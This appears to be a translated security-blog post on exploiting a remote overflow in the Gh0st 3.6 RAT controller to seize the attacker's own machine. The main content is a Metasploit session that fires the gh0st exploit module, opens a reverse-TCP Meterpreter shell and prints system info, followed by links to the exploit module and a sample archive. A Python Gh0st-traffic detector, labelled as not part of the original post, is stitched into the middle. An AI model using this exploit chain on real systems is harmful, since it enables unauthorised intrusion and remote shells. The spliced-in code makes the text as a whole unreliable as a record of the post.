
K8哥哥

No system is absolutely secure

Using the Gh0st 3.6 remote overflow vulnerability to take control of the attacker in return

This post was published 317 days ago

Preface

The proof of concept was published in 2017, but in fact several overflow vulnerabilities in Gh0st had already been disclosed back in 2009.
This shows that using an open-source C2 tool is not necessarily safe. It is best to modify the tool yourself before using it; AV evasion alone does nothing against this.

MSF

Tested on WinXP at 2017-09-15
Run the Gh0st client, then use MSF to exploit the overflow on the C2 client machine; this gives you a shell on the attacker's machine in return.

msf > use exploit/windows/misc/gh0st
msf exploit(gh0st) > set RHOST 192.168.1.126
RHOST => 192.168.1.126
msf exploit(gh0st) > run

[*] Started reverse TCP handler on 192.168.1.125:4444
[*] 192.168.1.126:80 - Trying target Gh0st Beta 3.6
[*] 192.168.1.126:80 - Spraying heap...
[*] 192.168.1.126:80 - Trying command 103...
[*] Sending stage (957999 bytes) to 192.168.1.126
[*] Meterpreter session 1 opened (192.168.1.125:4444 -> 192.168.1.126:1070) at 2017-09-15 16:22:56 +0800
[*] 192.168.1.126:80 - Server closed connection

meterpreter > sysinfo
Computer : K8ANTI-B2B9B81C
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
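As an added example that is not part of the original post and is not code from Gh0st or from the Metasploit module, here is a small Python checker that recognises Gh0st framing on the wire, so a defender can flag both ordinary Gh0st C2 traffic to a controller such as the one on 192.168.1.126:80 above and frames whose declared lengths disagree with the bytes actually received, which a robust parser should reject rather than trust. It assumes the commonly documented Gh0st packet layout (a 5-byte "Gh0st" flag, total length and uncompressed length as little-endian DWORDs, then a zlib body whose first byte is the command token); that layout, the function names and the sample flows are assumptions of this example, not taken from the page.

```python
import struct
import zlib

# Assumed Gh0st frame layout (not taken from the page):
#   b"Gh0st" | total length (LE DWORD) | original length (LE DWORD) | zlib body
MAGIC = b"Gh0st"
HEADER_LEN = len(MAGIC) + 8
# Defender-side cap: never let a peer-declared length drive our allocation.
MAX_DECOMPRESSED = 1 << 20


def build_packet(payload: bytes) -> bytes:
    """Frame a payload the way a Gh0st peer would; used only to construct samples."""
    compressed = zlib.compress(payload)
    total = HEADER_LEN + len(compressed)
    return MAGIC + struct.pack("<II", total, len(payload)) + compressed


def parse_gh0st(data: bytes) -> dict:
    """Validate one frame. Every declared length is checked against real bytes."""
    result = {"is_gh0st": False, "issues": [], "command": None}
    if len(data) < HEADER_LEN or data[:len(MAGIC)] != MAGIC:
        return result
    result["is_gh0st"] = True
    total, original = struct.unpack_from("<II", data, len(MAGIC))
    if total != len(data):
        result["issues"].append(f"declared total {total} != actual {len(data)}")
    if original > MAX_DECOMPRESSED:
        result["issues"].append(f"declared original length {original} exceeds cap")
        return result
    try:
        # Bounded decompression: output is capped regardless of what the header says.
        body = zlib.decompressobj().decompress(data[HEADER_LEN:], MAX_DECOMPRESSED)
    except zlib.error as exc:
        result["issues"].append(f"zlib error: {exc}")
        return result
    if len(body) != original:
        result["issues"].append(f"decompressed {len(body)} bytes, header claims {original}")
    if body:
        # Assumption: first byte of the body is the command token.
        result["command"] = body[0]
    return result


# Constructed sample flows (not real captures): a well-formed frame, one with an
# absurd declared original length, one truncated in transit, and plain HTTP.
GOOD = build_packet(bytes([103]) + b"\x00" * 16)
OVERSIZED = MAGIC + struct.pack("<II", len(GOOD), 0xFFFFFFFF) + GOOD[HEADER_LEN:]
TRUNCATED = GOOD[:-4]
SAMPLE_FLOWS = [
    ("10.0.0.5", "192.168.1.126", GOOD),
    ("10.0.0.6", "192.168.1.126", OVERSIZED),
    ("10.0.0.7", "192.168.1.126", TRUNCATED),
    ("10.0.0.8", "192.168.1.126", b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"),
]


def scan(flows):
    """Return one alert per flow that carries Gh0st framing."""
    alerts = []
    for src, dst, data in flows:
        r = parse_gh0st(data)
        if not r["is_gh0st"]:
            continue
        severity = "malformed" if r["issues"] else "c2-traffic"
        alerts.append({"src": src, "dst": dst, "severity": severity,
                       "command": r["command"], "issues": r["issues"]})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_FLOWS):
        print(alert)
```

The point of the checker is the order of operations: the magic is matched first, the two declared lengths are compared against the bytes really present, and decompression is capped before any header value is believed. A controller that trusted those fields is exactly what a crafted frame can abuse; a sensor that does not trust them can still classify the traffic safely.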

EXP

https://github.com/rapid7/metasploit-framework/blob/be66ed8af3c355b1280e1a2bdbe5dd1a74e7bc58/modules/exploits/windows/misc/gh0st.rb

https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip
